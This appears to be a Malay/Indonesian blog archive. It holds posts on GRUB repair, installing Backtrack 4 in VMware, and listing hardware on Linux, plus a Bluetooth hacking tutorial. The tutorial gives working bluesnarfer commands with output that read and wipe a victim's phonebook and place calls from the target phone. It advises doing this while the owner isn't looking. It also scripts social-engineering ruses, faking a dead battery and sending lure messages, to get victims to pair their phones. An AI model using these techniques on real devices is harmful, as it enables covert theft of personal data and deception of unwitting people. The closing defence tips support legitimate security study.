Wednesday, July 9, 2014

APA NAK BUAT BILA ON LAPTOP KELUAR "GRUB is Missing Press Ctrl+Alt+DeL to restart"

  Tah macam mana pagi-pagi ni buka laptop keluar "grub is missing" dengan paparan Black Screen. Aduss dah lah ada benda urgen nak ambil data dalam laptop ni... Tapi tak pe memandangkan sel-sel otak telah bersambung benda ni jadi mudah je.

   Apabila mempekatakan tentang GRUB pastinya kita akan membayangkan MBR sebab fungsinya sama iaitu memilih dua atau lebih OS yang terdapat dalam komputer. Untuk pengetahuan saya mempunyi 2 os dalam laptop (win 7 dan kali linux) dan benda-benda ni biasa jadi kepada mereka yang mempunyi dua atau lebih dalam satu Desktop/Laptop.Ye saya tau anda tak paham. meh saya terangkan secara ringkas..

   MBR merupakan singkatan daripada Master Boot Record. MBR terletak dalam sektor pertama dalam hard driver dimana ia merupakan sektor pertama yang akan diperiksa selepas BIOS semasa boot up prosses.

 
 

  Dah apa kepentingan MBR ni..? Ok dalam MBR ni terdapat data-data berkenaan dengan logical partitions, file system dan yang paling penting executable code untuk membenarkan fungsi OS (Win xp,Win 7,Win 8,dsb) dijalankan. Itu pasal la kalau MBR ni hilang kita tak boleh load Windows yang kita install dalam komputer.

  Apa kena mengena ngan Grub plak..? Grub merupakan singkatan dari Grand Unified Bootloader yang dihasilkan oleh GNU Project. Dah nama pun bootloader mestilah fungsi dia sama macam MBR. Cuma fungsi grub ni lebih kepada memberi pilihan kepada pengguan yang menggunakan dua atau lebih os dalam satu komputer. Dalam MBR biasanya terdapat satu atau lebih grub/stage  yang di sebut sebagai grub stage 1,1.5,2, dimana ianya mengandungi bootloader yang membenarkan penukaran dari satu boot sector ke boot sector yang lain. Fungsi ini lah yang membenarkan user memilih os yang ingin digunakan setiap kali Komputer di hidupkan.

  Macam kes saya mungkin saya dah terdelete fail grub atau terubah mana-mana tempat yang berkenaan menyebabkan grub hilang atau tidak berfungsi dengan betul. so macam mana nak handel masalah ni.

Ok let's begain...

Apa yang anda perlukan ialah Bootable DVD os yang anda gunakan dalan komputer. Laptop saya menggunakan Win 7 so kena la cari Live DVD Win 7.

Langkah 1
- Masukan DVD Win 7 dalam Optical Drive dan tunggu sehingga  keluar









-Tekan Enter
* kalau tak keluar korang kena tukar boot order/sequence. Jadikan cd/dvd boot no 1..

Langkah 2
- Bila dah keluar gambo macam kat bawah ni, klick "Repair your computer"


image

Langkah 3

image

Kalau keluar menatang kat atas ni tekan Next je..jangan cakap banyak..then keluar gambo kat bawah ni...

image
Tekan "Command Prompt"

Langkah 4

Kat command prompt taip command mcm kat bawah ni :




 
 then,





Kalau nak tau fungsi setiap command kat atas atau command lain tu taip je...


 














  Kalau tak ada masalah, tutup command prompt dan restart komputer... Jangan lupa tukar boot seq dan keluar kan dvd win 7 tadi.




  Alhamdulillah lepas restart, laptop loding Win 7 dengan bergaya macam German belasah Brazil  untuk ke pelawanan akhir piala dunia 2014.. macam tak ada kena mengena jeeeerrr...


*cradit to : - http://en.wikipedia.org/wiki/GNU_GRUB
                 - http://www.inteligentcomp.com/2013/06/how-to-repair-fix-mbr-windows-7-8.html
             - http://www.howtogeek.com/howto/32523/how-to-manually-repair-windows-7-boot-loader-    problems/

Thursday, March 3, 2011

Backtrack dalam VMware

Backtrack 4 Final Installation in VMware with VMware tools

 
With the release of Backtrack 4 final a few days ago I decided to make a post on installing backtrack in VMware. There are many ways to run backtrack including a hard disk install, a USB boot install and of course as a live cd. My preferred method is with VMware so I decided to document my steps in case there is any one who would like to install in this way.
I will be covering a few things in this article:
  • Creating a proper Virtual Machine for Backtrack
  • Installing Backtrack to harddisk inside the Virtual Machine
  • Getting up and running with Backtrack and a few first steps
  • Install VMware tools in Backtrack
Tools I am using in this article:
  • Windows 7 as a host
  • VMware 7 workstation
This method should work on any version of VMware and on any platform. I installed in the exact same way on a Gentoo host with VMware server so I know its close if not the same.

Creating the Virtual Machine:

When you open up VMware you will be presented with the initial screen.
What we want to do is create a new virtual machine:
1-14-2010-8-33-04-AM
The next screen will ask us if we want to use the typical or advanced install:
1-14-2010-8-33-04-AM
For the sake of this article we are going to use the typical install method so go ahead a select that option
The next screen is going to ask us where the media is we want to install:
Backtrack comes in a .iso format so we can point VMware directly at the .iso file with out ever burning it to a disc. If you have already burned it to a disc simply point this screen at you r disc drive. If the .iso is on the host computer tou can just browse to its location.
1-14-2010-8-35-32-AM
Next we want to tell VMware which operating system we are installing in order to achieve the best default settings:
Since Backtrack is loosely based off of Ubuntu 8.10 Intrepid  we will use the “Linux” and “Ubuntu” selection. Make sure you do not select the 64 bit choice since Backtrack is currently only 32 bit.
1-14-2010-8-35-59-AM
Next we are going to want to give our Virtual machine a name:
I am pretty boring and always have lots of Virtual Machines going at once so I just name it the exact name and build of the distro. You can name it whatever you want of course. It will also ask you for the location you want to store the virtual machine. I generally leave this as the default folder VMware created when you installed it.
1-14-2010-8-36-29-AM
The next question is the size of the disk you want to make:
The absolute minimum for Backtrack is 5 gigs.  I would highly encourage you to multiply that by four at the very least. I can not tell you how many times I have run out of disc space in a virtual machine because I forgot I would be importing five and ten gig word lists.  I have choosen 30 gigs for my install but like I said its up to you. I also do not choose to split it into two gig files but once again you may prefer this method.
1-14-2010-8-35-59-AM
Okay so we are almost done getting our VM base going.
After selecting the disc space you will be presented with the summary screen:
This is a summary of all out options we have selected. You can at this point still change things.
1-14-2010-8-38-01-AM
Now there are two last things to change. Lets click on the advanced tab and configure a few things:
1-14-2010-8-38-49-AM
The first is memory:
Once again this is personal preference. I use backtrack pretty heavily everyday so I choose to give it two gigs of ram.  One gig would be fine as well since the GUI installer we will be using creates a swap space for us.
After selecting  that we need to set network adapter:
This is another personal preference however I like my Virtual machines to be on the same private subnet as my host is. For example if my NAT address is a 192.168.1.0/24 address I like my VM’s to share the same addressing scheme. In order to do this we need to select bridged in the network adapters section.
1-14-2010-8-39-14-AM
Great so the machine is all set. Now lets get on with the installation.

Installing Backtrack:

The installation of Backtrack is fairly straight forward however we will go through it anyway just to be sure we cover all the bases. Once we are are done with building our virtual machine we want to power it on. If its successful we will be presented with the boot screen of backtrack.
1-14-2010-8-39-50-AM
Select the first option on the boot screen which is the default 1024 x 768 option. Once the system gets booted up you will be presented with a shell prompt. In order to get our graphical desktop going we are going to want to type “startx”.
1-14-2010-8-41-24-AM
At this point we are looking at the KDE desktop. If you notice on the upper left hand corner of the screen there is a icon which says install. We are going to double click on this icon in order to start the GUI installer.
1-14-2010-8-41-56-AM
Most of the GUI installer has been automated by the work of the Backtrack developers so there are only a few steps to make.
The first is to choose your time zone:
1-14-2010-8-42-37-AM
Next we need to choose our keyboard layout:
1-14-2010-8-42-59-AM
Next we see the partition editor:
1-14-2010-8-43-23-AM
I am not going to go into how to partition your drive manually since that would be a whole new article. In a situation like this where we have a virtual machine, it is fine to accept the default partition scheme and use the entire disk.
Ready to install:
1-14-2010-8-44-04-AM
I would like to make one side note here. If you are  familiar with Ubuntu at all you will notice that some steps are missing from the installer. You may also notice that in the bottom left corner it jumped from step four to step seven. Do not worry. This is the way we designed the installer. One of the main reasons is that Backtrack is designed to be run as root and not a regular user. You are of course free to add users and whatever else you like however due to various reason that was built out of the installer.
Press install and let it go:
1-14-2010-8-44-22-AM
The big finish:
1-14-2010-8-56-59-AM
The installer can take any where from ten minutes to forty  minutes depending on the speed of your machine so feel free to go out and grab a cup of coffee. Once its finished go ahead and select restart and lets boot into our brand new shiny Backtrack 4 install.

Getting up and running with backtrack – First steps

The most common question:
The one question we are always asked is what is the log in. As I said earlier we use the root acount by default so the log in name is root. The default password is simply root backwards so its toor.
1-14-2010-8-58-38-AM
Next most common question:
How do I get on the internet? By default Backtrack is designed to start up in a “stealth” mode. For this reason there are no interfaces started at boot. This is anoying for many people so I will show you how to change that. There are two ways to bring your interface up.
If you only want to start one interface:
1-14-2010-11-19-51-AM
For this method we are only going to start the eth0 interface so we just bring it up and issue the dhclient script to get a addresss from our dhcp server.
I’m lazy and I just want to start them all:
1-14-2010-11-20-55-AM
There is a init.d script which tried to start all the interfaces defined in /etc/network/interfaces. You can add or remove them in that file based on your hardware.  SO invoking this script will try to start and get address’s for five or six different interfaces.
I need a static IP:
1-14-2010-11-29-23-AM
In the /etc/networking/interfaces file you can also add you static ip information as I have shown. Do not forget to also add a nameserver to /etc/resolv.conf.
1-14-2010-11-30-18-AM
I am really lazy and I just want to start all my interfaces at boot:
1-14-2010-11-21-30-AM
Adding something to the boot process is fairly easy in Backtrack. We simply add it to the default run level with the command update-rc.d as shown in the picture.
How do I start ssh:
You have to generate the keys in backtrack in order to start the ssh daemon.
1-14-2010-11-22-07-AM
After you do that you can start ssh like normal from its init.d script.
1-14-2010-11-23-04-AM
And you can also start ssh at boot in the same way we started networking with update-rc.d
1-14-2010-11-22-38-AM
I want to change my hostname to something worthy of a hacker:
1-14-2010-11-57-10-AM
The file that contains the hostname is called /etc/hostname. Just change this to whatever cool name you think you deserve to be called. The host name will change on reboot but if you cannot wait you can simply restart the init.d script for the hostname. the command is /etc/init.d/hostname start. Once you close the cuurent shell and open a new one you can see your new hostname.
1-14-2010-11-58-00-AM

Installing VMware tools

I get asked about this more frequently than anything else so hopefully this will clear up the install of VMware tools. VMware tool greatly enhances the graphics and mouse control in a virtual machine. It also allows shared folders with the host and copy & paste with paid versions of VMware workstation. VMware server is free however it lacks a few of the features.
Select install vmware tools from the menu:
1-14-2010-11-34-19-AM
Open up the Konqueror file manager icon which is on the tool bar on the bottom left had corner:
1-14-2010-11-46-04-AM
Select Storage Media:
1-14-2010-11-46-34-AM
If the page opens up blank thats ok. Either hit the green refresh icon on the tool bar or hit f5. I have never figured out this behavior however its really no big deal. You should be looking at the VMware tools CD icon. Double click on that and you will see the vmwaretools.tar.gz file.
Copy the archive to your desktop:
1-14-2010-11-48-25-AM
Once we get the archive on or desktop we can work with it.
Open a terminal and un tar the archive:
1-14-2010-11-49-59-AM
Change directories into the VMware tools file and run the .pl install script:
1-14-2010-11-52-19-AM
I choose all the defaults for the sake of simplicity. For my purposes all the default selections are fine. If you know what you are doing feel free to look at every question and decide on the best choice for your system. Once it gets done running you will be presented with a screen like this which means the install is complete.
1-14-2010-11-55-02-AM
Clean up:
1-14-2010-11-55-45-AM
At this point you can safely delete the VMware folder and archive from you system and be finished with the install. Now you can kick back and enjoy the best security distribution around.

Friday, April 23, 2010

Device yang terpasang dalam Komputer anda ?

Cara melihat semua jenis Device yang terpasang dalam komputer anda.(Ubuntu )


Ada kalanya kita perlu mengetahui jenis device yang terpasang dalam komputer kita untuk tujuan tertentu. Dalam linux beberapa command di sediakan untuk tujuan tersebut.

Antaranya :
# dmidecode --type 17 - untuk melihat data bagi RAM
# lshw - data untuk semua jenis device.
# lshw-gtk - untuk lihat secara GUI

tapi sebelum itu anda perlu install lshw-gtk terlebih dahulu :

# apt-get install lshw-gtk



selamat mencuba...


Tuesday, March 30, 2010

bluetooth hacking

---//  Pengantar

Bluetooth adalah salah satu teknologi pengganti kabel yang mengkonsumsi
sedikit tenaga listrik, memiliki harga yang relatif murah, berjarak relatif
pendek (10-100m), dan dapat digunakan untuk pertukaran data dan suara.

Riset tentang teknologi "bluetooth" yang telah dilakukan oleh ericsson(tm)
pada tahun 1998 telah memberikan dampak yang cukup besar pada teknologi
"pengganti kabel" atau yang lebih sering aku kenal dengan "wireless technology".
Riset ini Kemudian dilanjutkan oleh sebuah grup yang menamakan dirinya
Special Interest Group dengan "codename" bluetooth dan telah di dukung oleh
banyak perusahaan besar yang berkepentingan dengan teknologi ini. Sehingga
pada tahun 1999 dikeluarkanlah versi pertama (bluetooth ver 1.0) dan versi
yang sekarang digunakan adalah versi 2.0 (merupakan ver 1.2 ditambah EDR).

Teknologi bluetooth sampai saat ini tetap dipakai dan di kembangkan pada
kurang lebih 856 produk[3].

---// Why attacking bluetooth ?

1. Bluetooth dipakai pada peralatan pribadi yang umumnya menyimpan
informasi penting yang bersifat pribadi juga dan menjadikannya
sebagai target yang berharga bagi penyerang

2. Untuk menyerang device bluetooh penyerang tidak perlu untuk melewati
Lapisan firewall, policy, third party security application, IDS/IPS.

3. Bisa ditemukan dibanyak tempat di karenakan layanan ini di pakai
dibanyak "device".

---// Technical Details

- Menggunakan frekuensi 2,4GHz
- 79 channel, dengan lompatan frekuensi 1600 hops/second
- Menggunakan "single chip radio" sehingga harganya relatif murah
- Memiliki "range" 10-100 Meter
- Menggunakan 2.5 mW
- Memiliki Data Rate 1Mbps

---// Bluetooth Mode

-------[ 1. Service mode

a. mode menyala ("on" mode )
Untuk mode "on" terdapat mode "discoverable" dan "un-discoverable",
dimana pada saat discoverable "device" akan dapat dan untuk di temukan
oleh "device" lain. Sedangkan un-discoverable mode mengakibatkan
secara umum tidak dapat di temukan oleh "device" lain.

b. mode tidak menyala ( "off" mode )
Layanan bluetooth mati pada mode ini

c. mode otomatis ( "automatic" mode )
Layanan ini akan memudahkan aplikasi untuk menggunakan layanan bluetooth

-------[ 2. Security mode

a. Security mode level 1
Tidak ada mode sekuriti sama sekali

b. Security mode level 2
Sekuriti terdapat pada level "service", tetapi pada level "device"
tidak ada terdapat.

c. Security mode level 3

Sekuriti terdapat pada level "device" dan menerapkan sekuriti pada
setiap level yang lebih rendah.

---// Bluetooth Security threat

-------[ 1. Bluejacking

Teknik ini dilakukan dengan cara mengirimkan pesan/gambar/nomer
telpon tanpa ijin kepada target, tujuannya adalah mulai dari perbuatan
iseng sampai pada "social engineering" untuk memancing target melakukan
pairing kepada "device" penyerang.

-------[ 2. Bluesnarfing

Teknik ini mengijinkan penyerang untuk terhubung ke "device" milik
target tanpa diketahui pemiliknya dan akan mengakibatkan penyerang
dapat mengakses data data penting yang tersimpan didalam "device" target
seperti daftar nomer telepon (buku telepon), "business card", "images"
bahkan IMEI (International Mobile Equipment Identity ) yang dapat
mengakibatkan nomer tersebut untuk di "clonning".

-------[ 3. BlueBugging

Teknik ini mengakibatkan "device" target dan penyerang terhubung secara
serial dan mengakibatkan penyerang memiliki kendali penuh terhadap
"device" target sehingga penyerang juga dapat mengeksekusi set perintah AT
(ASCII Terminal) diantaranya untuk melakukan panggilan, mengirim dan
membaca SMS, melakukan koneksi jaringan bahkan internet melalui "device"
target sampai kepada "identity theft".

-------[ 4. BlueSmack

Teknik ini melakukan serangan Denial Of Service terhadap device target, salah
satu caranya adalah memanfaatkan perintah l2ping pada protokol L2CAP.

-------[ 5. Backdoor Attack

Teknik ini adalah dengan memanfaatkan "pairing" yang telah tercipta antara
"device" target dan penyerang. Memanfaatkan Kelengahan Target dan Teknik
social engineering.

---// Basic Penetration

Berikut akan aku lakukan penetrasi mendasar terhadap bluetooth sekuriti,
dengan harapan akan memberikan pemahaman mendalam tentang ini.

-------[ 0. Info

Target : Mobile phone Sony ericsson t68i
Penyerang : Toshiba tecra 8100
Linux Ubuntu 5.10 Operating system
USB bluetooth dongle with Bluez

Tools : Bluesnarfer
Bluez-utils
RedFang

-------[ 1. Preparation

Sekarang lakukan checking terhadap bluetooth device (USB dongle) menggunakan
hciconfig (packet Bluez)

//--- command ----//

y3dips@hogwartz:~$ hciconfig -a hci0
hci0: Type: USB
BD Address: 00:09:DD:10:4E:B1 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING PSCAN ISCAN
RX bytes:394 acl:0 sco:0 events:18 errors:0
TX bytes:319 acl:0 sco:0 commands:17 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF PARK
Link mode: SLAVE ACCEPT
Name: 'hogwartz-0'
Class: 0x3e0100
Service Classes: Networking, Rendering, Capturing
"device" Class: Computer, Uncategorized
HCI Ver: 1.1 (0x1) HCI Rev: 0x460 LMP Ver: 1.1 (0x1) LMP Subver: 0x460
Manufacturer: Cambridge Silicon Radio (10)

//--- command ----//

didapatkan beberapa informasi penting, diantaranya:
1. Type: USB
2. BD Address: 00:09:DD:10:4E:B1
3. Service Classes: Networking, Rendering, Capturing

Baiklah, ternyata "device" berjalan baik dan dikenali oleh system.

-------[ 2. Scanning

Setelah semua persiapan berjalan dengan baik maka selanjutnya adalah menemukan
target, untuk mendeteksi layanan bluetooth yang aktif (mode menyala) dan
juga "discoverable", aku hanya menggunakan hcitool (paket Bluez)

//--- command ----//

y3dips@hogwartz:~$ hcitool scan
Scanning ...
00:0A:D9:49:B6:8B T68i
00:0C:55:FF:F3:B6 heaven-0
00:D5:F9:33:B6:A4 dodlesvck
00:60:57:44:56:B3 6310i

//--- command ----//

Yupe, aku menemukan ada 4 buah "device"yang mengaktifkan layanan bluetoothnya.
dan aku putuskan untuk bereksplorasi satu persatu, untuk itu aku putuskan
akan melakukan penetrasi sesuai urutan :)

Selanjutnya adalah melakukan perkenalan lebih jauh dengan "device" tersebut,
dan untuk ini digunakanlah sdptool (paket bluez) untuk melakukan browsing
dan secara spesifik aku tambahkan options "grep" khusus untuk menemukan
service apa saja yang di layani oleh "device" tersebut, "device" akan di kenali
dengan alamat bluetooth.

dalam hal ini untuk "device" pertama adalah 00:0A:D9:49:B6:8B

//--- command ----//

y3dips@hogwartz:~$ sdptool browse 00:0A:D9:49:B6:8B | grep Service\ Name
Service Name: Dial-up Networking
Service Name: Fax
Service Name: Voice gateway
Service Name: Serial Port 1
Service Name: Serial Port 2
Service Name: OBEX Object Push
Service Name: IrMC Synchronization
Service Name: Voice gateway

//--- command ----//

Dan kita dapatkan bahwa device tersebut memberikan service Dial-up Networking,
Fax, Voice Gateway, Serial Port, OBEX, IrMC.

Untuk melakukan cek hubungan dengan device maka kita dapat melakukan ping.

//--- command ----//

y3dips@hogwartz:~$ sudo l2ping 00:0A:D9:49:B6:8B
Ping: 00:0A:D9:49:B6:8B from 00:09:DD:10:4E:B1 (data size 44) ...
0 bytes from 00:0A:D9:49:B6:8B id 0 time 46.69ms
0 bytes from 00:0A:D9:49:B6:8B id 1 time 31.24ms
0 bytes from 00:0A:D9:49:B6:8B id 2 time 37.95ms
0 bytes from 00:0A:D9:49:B6:8B id 3 time 33.01ms
0 bytes from 00:0A:D9:49:B6:8B id 4 time 48.04ms
5 sent, 5 received, 0% loss

//--- command ----//

-------[ 3. Owning

Setelah melakukan Scanning dan mendapatkan alamat target dan informasi
mengenai service yang dilayani oleh device tersebut maka selanjutnya kita
akan melakukan "snarfing" terhadap bluetooth device (Bluesnarfing).

Salah satu erangan yang mungkin adalah membaca buku telepon dari device
dengan menggunakan bluesnarfer.

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -r 1-10
"device" name: T68i
+ 1 - My Sephia /M : 08883535266
+ 3 - Mbah Marijan/W : 021454545
+ 5 - Osama Laden/W : 662224258
+ 7 - Warung Pecel Bu Roso/W : 0214545889
+ 9 - Superman/W : 911
bluesnarfer: release rfcomm ok

//--- command ----//

Selanjutnya kita juga dapat menghapus buku telepon

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -w 1-10
"device" name: T68i
delete of entry 1 successfull
delete of entry 2 successfull
delete of entry 3 successfull
delete of entry 4 successfull
delete of entry 5 successfull
delete of entry 6 successfull
delete of entry 7 successfull
delete of entry 8 successfull
delete of entry 9 successfull
delete of entry 10 successfull
bluesnarfer: release rfcomm ok

memeriksa apakah sudah terhapus

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -r 1-10
"device" name: T68i
bluesnarfer: release rfcomm ok

//--- command ----//

Selain itu aku akan mencoba melakukan Bluebugging dengan cara mengeksekusi
perintah AT, dalam hal ini ATD (melakukan panggilan)

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -c 'ATD555;'
"device" name: T68i
custum cmd selected, raw output
OK
bluesnarfer: release rfcomm ok
y3dips@hogwartz:~/Desktop/bluetooth/pentest/snarf$

//--- command ----//

Tapi ingat, dengan melakukan panggilan ini maka akan tampak pada layar target
bahwa sednag melakukan panggilan terhadap nomer tertentu. (Sehingga sebaiknya
dalam melakukan panggilan pada saat target tidak berinteraksi langsung dengan
device)

---// 31337 penetration

-------[ 1. Backdooring

Teknik Backdooring ini bisa dilakukan dengan cara berinteraksi secara langsung
ataupun tidak, teknik ini bertujuan membuat "device" target melakukan "pairing"
dengan device penyerang.

Social enggineering berperanan penting pada teknik ini.

Example

a. Berinteraksi langsung

Seperti teknik social engineering yang pada umumnya dilakukan adalah
dengan cara berinteraksi secara langsung dengan device target.

real life example:

Ingat, perubahan kartu SIM, menghidupkan dan mematikan Device tidak
menghapus pairing yang telah terbuat, celah ini membuat aku berpura-pura
kehabisan batere handphone dan meminjam handphone target untuk mengirim
sms, agar target semakin yakin maka aku gunakan nomer yang aku miliki
(agar lebih meyakinkan lagi maka sebiknya handphone kamu emang tidak
bisa menyala), setelah itu cobalah lakukan pairing kedevice kamu, sebelum
itu ada 2 hal yang harus aku lakukan

1. menentukan PIN untuk diisikan dari handphone target

//--- command ----//
root@hogwartz:~# echo "4321" > /etc/bluetooth/pin
//--- command ----//

2. Dan kamu perlu membaca syslog untuk mengetahui alamat target
yang terhubung.

//--- command ----//
root@hogwartz:~# tail -f /var/log/syslog | grep hcid
Aug 21 20:25:30 localhost hcid[8880]: pin_code_request \
(sba=00:09:DD:10:4E:B1, dba=00:0A:D9:49:B6:8B)
//--- command ----//

ya, dan sekarang aku tinggal matikan handphone dan tukar kartu SIM kembali,
selanjutnya tinggal bereksplorasi di "device" target.

b. Berinteraksi Tidak langsung

Cara kedua ini dikombinasikan dengan teknik BlueJacking, pada cara ini
aku hanya perlu mengirimkan gambar/text/lagu/ atau apapun ke device
target sehingga target akan melakukan cek terhadap info device pengirim
yang tampil pada "device" target dan jika target berniat menerima
gambar/text/lagu/ tersebut maka dia harus melakukan pairing dan perlu
memasukan sebaris PIN.

(nama device; yang bisa di definisikan pada deviceku), Karena karakter
di beberapa "device", jumlah karakter tidak dibatasi maka memungkinkan
kita untuk menuliskan sebaris kalimat yang "membujuk" (inti social
engineering) seperti "FOTO NADINE NIH?" atau "UNTUK MENERIMA KETIKKAN
4321"

Selanjutnya tinggal tunggu hasil pairing kita :) .

-------[ 2. Detecting the undetected

Baiklah, sekarang bagaimana kalau "device" tersebut tidak di set discoverable
sehingga aku akan kesulitan mendapatkan alamat device, dan aku pun tidak mungkin
meminjam handphone ("device") target karena satu dan lain hal (pelit mungkin:P).

Beruntunglah aku dikarenakan ada satu tools yang dipublikasikan dengan nama
"redfang" dan mampu mendeteksi "device" bluetooth yang menyalakan layanannya
tetapi tidak di set discoverable.

//--- command ----//

y3dips@hogwartz:~/bt/fang$ sudo ./redfang -r 000AD949B689-000AD949B68D
redfang - the bluetooth hunter ver 2.5
(c)2003 @stake Inc
author: Ollie Whitehouse
enhanced: threads by Simon Halsall
enhanced: "device" info discovery by Stephen Kapp
Scanning 5 address(es)
Address range 00:0a:d9:49:b6:89 -> 00:0a:d9:49:b6:8d
Found: T68i [00:0a:d9:49:b6:8b]
Getting "device" Information.. Failed.

//--- command ----//

Dan akupun mendapatkan alamat target. :) , salah satu kelemahannya adalah
kecepatannya dalam menemukan adalah sangat lambat, aku sering menggunakan
options "-t" untuk meningkatkan waktu timeout dan mempercepat scanning.
atau bisa melakukan "recursive execute". (automated ? -- in proggress)

---// Mitos dalam "bluetooth [in]security"

[1] Matikan saja layanan Bluetoothnya niscaya akan aman

Mematikan layanan bluetooth ("off" mode) pada "device" tidaklah 100%
akan membuat "device" aman. Serangan yang mungkin dilakukan adalah
Social engginering dan Malicious program (virus, worm & trojan)
yang dapat secara otomatis menyalakan layanan bluetooh ("on" mode)
atau bahkan melakukan pairing/backdoor attack ke bluetooth "device".

Jadi perkuat device anda dengan firewall dan juga antivirus

[2] Di Buat "[un]discoverable" akan aman

Lihat sub-chapter "31337 penetration" pada bagian kedua "Detecting
the undetected"

[3] Tidak ada informasi penting di bluetooth "device"

Salah, ambil contoh "mobile "device" (phone, smart phone, laptop)"
Hampir seluruh data penting tersimpan, misalkan mobile phone, disana
terdapat seluruh nomer nomer yang penting bagi anda meskipun anda
tidak termasuk orang penting :P .

[4] Jaraknya pendek

Jarak bluetooth device umumnya pendek 10-100 Meter, tetapi dengan
adanya teknik untuk memperkuat signal[6] maka jangkauan pun bisa
di perjauh bahkan sampai 1 km.

[5] Penyerangnya pasti akan tampak "aneh" dan "mencurigakan" [karena membawa
-bawa laptop dan bluetooth device yang di modifikasi (perkuat sinyal)?]

Tidak juga, bahkan sekarang via mobile phone/PDA (java supported)
bisa melakukan "assessment"[2].

---// Bertahan ?

[1] Update informasi anda tentang "device" anda (khususnya soal security)
[2] Update Frimware anda, jikalau termasuk "device" yang di curigai
[3] Periksa daftar "trusted Pair", hapus yang sudah tidak dibutuhkan, hindari
backdoor attack
[4] Gunakan Fitur keamanan tambahan (eg: Antivirus, Firewall)
[5] Untuk meminimalisir serangan matikan layanan bluetooth anda jika tidak
digunakan
[6] Jikapun dibutuhkan, buatlah PIN yang relatif kuat.
[7] Pastikan untuk tidak sembarangan melakukan koneksi/pairing (eg: terima
file dari "unknown device")

---// Clue

Sebagian handphone memiliki celah terserang teknik bluesnarfing ataupun
bluebug saat visible (discoverable) dan sebagian lainnya non-visible
(non-discoverable), sementara beberapa jenis lainnya tidak vulnerable
kecuali dengan menggunakan backdoor attack dan teknik bluejacking
(Social engineering)

---// Kamus

Pairing adalah suatu bagian (state) yang dilakukan apabila dua buah
"device" setuju untuk berkomunikasi satu sama lainnya, setelah state
ini terjadi maka apabila ingin terjadi komunikasi ulang maka akan
membypass proses pencarian (discovery) dan otentikasi (authentication)
yang biasa terjadi pada saat interaksi.

---// Referensi ( echo.or.id - Ammar )

[1] y3dips, "Owned a mobile "device" via bluetooth", dipresentasikan dan
didemokan pada "Cryptography and Wireless security seminar", 2006
[2] Trifinite official site`s. http://trifinite.org
[3] SIG. http://bluetooth.org
[4] http://thebunker.net
[5] wikipedia. http://en.wikipedia.org
[6] bluesniper. http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/

---// Greetz

Thanks : Yudhax